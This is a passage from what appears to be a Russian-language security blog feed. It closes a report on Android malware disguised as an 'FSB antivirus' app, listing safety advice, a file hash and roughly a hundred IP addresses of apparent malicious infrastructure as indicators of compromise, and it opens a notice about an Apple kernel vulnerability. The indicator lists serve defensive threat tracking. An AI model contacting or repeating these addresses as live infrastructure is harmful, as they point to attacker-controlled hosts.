<li>Не стоит скачивать приложения с открытым исходным кодом из неизвестных источников, так как их легко видоизменить. Лучше скачивать их из <a href="https://play.google.com/store/apps/details?id=com.goodwy.dialer" rel="noopener" target="_blank">Google Play</a> или брать последний релиз со <a href="https://github.com/Goodwy/Dialer" rel="noopener" target="_blank">страницы разработчика</a>.</li>
<li>Не предоставляйте приложениям разрешения, которые им не потребуются (особенно разрешения <code>Accessibility Service</code>).</li>
<li>При подозрении на заражение ВПО проверьте список установленных приложений или воспользуйтесь средствами для отслеживания активности.</li>
</ul>
<p><strong>Файловые индикаторы</strong></p>
<table>
<tr>
<th style="text-align:center">Имя</th>
<th style="text-align:center">Хеш</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td style="text-align:center">Антивирус ФСБ.apk</td>
<td style="text-align:center"><code>5c2cbb7cad7d8d4e6dc36c9a35a1c589</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/891fca3b-4147-44ff-b3e6-971328108123" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><strong>Сетевые индикаторы</strong></p>
<table>
<tr>
<th style="text-align:center">IP</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td style="text-align:center"><code>2.56.179.190</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2cafeb3e-2bcc-4b8f-96ac-cb9d502f3091" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>2.59.183.215</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bc1a83d2-3b29-4bb3-a4bb-be0f1227dd53" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.45.93.167</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0e1cb322-c983-4a00-9157-4279a65c4caa" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.37</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/84ef357d-6ab2-449c-b4a9-52e28f3958ba" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.39</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5f3a4463-2398-46b3-805c-b7e2384dadb2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f786dee-d04a-4f99-8a18-d7dc3663ec48" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.172.75.46</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8a4623e7-da82-47f0-84da-d2c8fdc693" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.192.237.132</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3046b229-3bb6-4fa4-8bcc-615cfe842acf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.214.157.53</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d15a7260-f2e0-4dc8-badb-20bd71c5f257" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>37.10.71.100</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a7c5e6cc-3fac-458f-94d3-1002bee01cf0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.3.187</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b262c837-2070-42ff-9ff3-695432a93f1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.87.241</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f2da26ab-1e0e-46f3-be4d-61e570e873ac" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.144.105</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b1bd9099-a2d3-4c76-90f1-9a39c7f0bbad" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.244.208.134</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/61bb9725-dd6a-4b13-a022-e2e1fd026e93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.145.60</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1e254ac0-3c24-42a2-b325-9fbeccf4fe89" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.228.204</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/32c2408c-13a5-4255-91e3-24d3cb362a13" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.230.157</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/174c3081-6759-447a-a606-f1fb850373d8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.10.246.197</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c9e459f9-8fdd-4642-8316-5a2086624eec" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.12.111.27</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0c7beee1-1f44-480e-9500-139294619645" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.15.126.252</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b12144ad-e99b-4225-8a46-61b227a138fd" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.35.58</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e20adc9d-3287-404b-82ac-fdd954fb45b9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.231.139</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8d01ff09-00b5-44cf-85fa-2671f8cd9903" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.231.215</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/922ebedb-efcd-4503-adcd-37f8aa5e4f17" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.82.255.173</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fbc699b5-4b94-4514-91e4-4fa23a3bcc86" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.85.93.206</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0810c649-cca5-44e7-b5a0-c247cfade8c4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.89.52.163</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2ef95897-7820-4e30-aa4a-f9659d414633" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.89.111.233</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3012ef2f-2f68-4a2d-aeef-3e0063c24fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.129.242.236</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d1cf0ff3-eb99-48be-b19e-23258958e665" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.135.164.207</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f8903424-cd11-49d0-a0a9-364be89fcca4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.142.36.207</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e7c7181c-9a92-4619-9fb1-66e2301b9148" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.150.64.118</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a3312fa6-08a8-47f3-af11-a4c087eafb48" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.150.64.131</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/33de5be9-7ba0-4c84-9c48-9e8f14fe8eac" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.155.249.165</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ff3662ae-a3c9-4ba8-8de4-691fcc2c76c9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.159.248.127</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b0126dfb-c955-455e-a73d-ffc55e6f733b" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.159.248.251</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7aa008f9-6dde-4e59-859c-75f19ae37957" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.197.133.82</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b04def4f-b9fe-4a5c-89b5-d2a7612e42cb" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>46.28.70.26</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0a771f19-09cf-4656-95ab-ecdb58d5ba02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>46.28.70.244</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/17e5f241-c2df-4213-ab0e-84c265fdc693" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.25</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f3627c6a-ab11-4682-a892-35374a883bf3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.33</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/72078baa-d9a1-48c7-8928-eb3cecb69f67" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.74</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c6573500-6cfd-459e-a1e1-868261d19de7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.87</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/44568572-22d7-4800-8d92-cb7644825be3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/484ebfd0-77ff-4939-abf3-7281dd1ba5fc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ca69b0a8-0306-4011-a882-f7a646074781" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.219</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a449a57e-0add-42d4-9b21-34ef505a51a4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.233.57.162</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6e50eeb4-d2f7-49cd-b688-77d465637daf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>79.132.130.73</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5719aa06-1be8-4f29-8a08-2fc9a5d21b04" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>81.22.132.87</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d71d49c9-d42b-4ac2-9172-67f3e62aba4c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>83.217.210.129</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/663d7f6f-05dd-4bee-937c-c4522c8f2b9c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>83.217.210.163</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/42702054-deb5-480c-814b-0808c03cb19c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.208.110.57</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dc749816-9889-4b2e-be1f-541958d7a82c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.208.208.123</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/00a5116e-f232-44c8-8213-8888888aed1b" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.209.153.229</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2867c968-be1e-4f1f-99c8-cc13ff08e02a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.239.53.5</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7bc5f1f0-7e4b-4b0a-9194-768f65cf6a84" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>86.104.75.160</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9f593ec2-d394-45f5-9cea-3db20312b661" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>88.218.93.20</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0f8a8c37-cbc8-485f-bf91-665d8faec0d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.42.142.240</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/209c48a9-229e-464e-8b93-fe6c4fab7684" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.124.114.178</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/834a2093-3807-4173-969c-d7e5ffdbe175" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.127.206.241</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9275a654-cc8e-4bb9-9b58-5b5d729fbbd0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>92.118.230.34</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ac3c1085-b06c-4628-b5a2-34d9e9049219" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>93.183.92.96</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e1be4332-0fea-4f37-aeb7-a36ffeda41c1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.130</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3999ecc6-1240-4b29-a5ac-744d1eb2b92a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.132</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/db3f1d4d-519e-431f-a823-fc56747d25a7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fd099f79-d1e5-4844-a7a7-4da89d33a347" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.100.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/350f2ccd-aa35-494a-a1c1-b63af4b38802" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.111.91</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0b0f39f2-4ba0-4f99-aa76-418497adacf9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.118.221</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bfe6299f-7bf6-4214-8f7e-8327ab033e22" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.120.179</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c386dfee-8e09-415f-b877-fff3ec39db14" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.122.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/56ec2eb6-ff91-4a5f-8ea4-0f602ed669b3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>95.164.86.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/254b4cb1-98c2-4e2a-8206-113eddfe451e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>95.216.232.141</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/aab05bde-0e67-4042-b7e4-1699b1471746" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>103.213.249.128</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/48f44458-e6b8-4e99-ab4a-5807effdd365" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>109.172.31.68</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a97769ae-13fe-4dea-8b07-1399e670aec6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>135.181.14.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a1592243-41f9-45a9-b9a2-e648b762feb3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>136.243.118.134</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bafe5944-ccb5-41ad-8485-7c5a7fe7bae2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>144.76.48.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3f82c801-794e-496c-9d50-4cf13b209d66" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>148.251.240.89</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/19b3e5a8-1ac8-4ff5-a0a8-e3c2a850b975" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>157.90.14.184</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/239a2d5b-9353-4391-af5f-7141de3ef10e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>157.90.14.191</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8ff94a9a-756b-4f16-a126-ebc6688cd5ba" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>159.69.228.231</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a76fae87-d306-490e-baaf-b2a7022d40f0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>170.168.15.160</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f9e47ab6-b53c-4ae9-88d1-babc1931c9de" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.120.67.190</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4935d0f1-eafb-4072-ba8f-cb8a6c620e9a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.124.222.67</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/203dbaee-6a7f-466a-a2d9-e9e20d0ea565" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.124.222.69</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ea374a34-ed87-49b0-b82f-4bf846688002" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.68.21.191</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f22da70-dba6-4a3d-b55f-d667fed741b8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.34</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/81742e63-73b3-4623-96a9-3e1385ee940d" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.67</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b3a62dfb-0604-49c3-b3eb-3168ca098142" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.143</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a3621be6-b21f-4f0f-9086-6f5e98be1af2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.240.103.235</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2e614626-dbfc-41cb-94b6-8c2ca74124a1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.246.220.35</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f9a1039-08c9-4c69-99b8-01389fa2da31" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.255.178.18</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/63608d20-d714-4ceb-9c16-19f3e9555e4f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.255.178.223</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b5305265-0e9c-4a76-9e39-bde0ee9d230a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>188.40.171.83</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7fd4d08e-0a77-4eb0-9588-85a50cdc22a5" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.108.114.13</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c93c646d-e2d1-4fe1-9787-ea971c2ee4c9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.124.118.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d535957b-4e30-4888-a83e-b3c473d12842" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.233.88.253</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d4660b0-23a3-45d4-b126-3b05bf80a13d" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.87.210.125</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/371703d1-9f82-4441-856b-f4fe2e16a9cd" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.154.24.88</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/78a5b717-ef21-45be-a171-30fc6e3c27cf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.154.25.188</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/05a5d93e-a5e8-42ba-9f68-777d2bcfc532" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>195.63.134.89</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7182f407-7d7e-4f8b-a71a-2a3f670c9b20" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.19</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d17bdc10-6644-41ff-8de4-0209cc6bd4c4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.23</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/54a99aa1-a694-484c-850a-58ddcd457683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.25</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/722d5bbc-4018-4e7f-9b7e-d556ee77981f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.39</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bee6f6b0-422a-4e37-8960-af279c719431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.43</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e7ddf49b-882a-46d1-9e62-600900719d36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.55</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/72d7ee90-6e5e-4c84-8311-0f4265f43c58" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.65</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f7a8392d-6f7b-4d3b-ba79-6f7376a4652e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.70</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2c8eeaa9-3eba-40f9-a6f0-375eb3f1fca6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.200</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/69cc0a44-5f0a-499c-bf08-22ae11189cdc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#android</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Мы помогли Apple устранить уязвимость в ядре ее операционных систем</title>
		<link>/we-helped-apple-fix-a-vulnerability-in-the-kernel-of-its-operating-systems/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Fri, 25 Sep 2026 17:20:39 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[macos]]></category>
		<guid isPermaLink="false">/%d0%bc%d1%8b-%d0%bf%d0%be%d0%bc%d0%be%d0%b3%d0%bb%d0%b8-apple-%d1%83%d1%81%d1%82%d1%80%d0%b0%d0%bd%d0%b8%d1%82%d1%8c-%d1%83%d1%8f%d0%b7%d0%b2%d0%b8%d0%bc%d0%be%d1%81%d1%82%d1%8c-%d0%b2-%d1%8f%d0%b4/</guid>

					<description><![CDATA[Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory…]]></description>
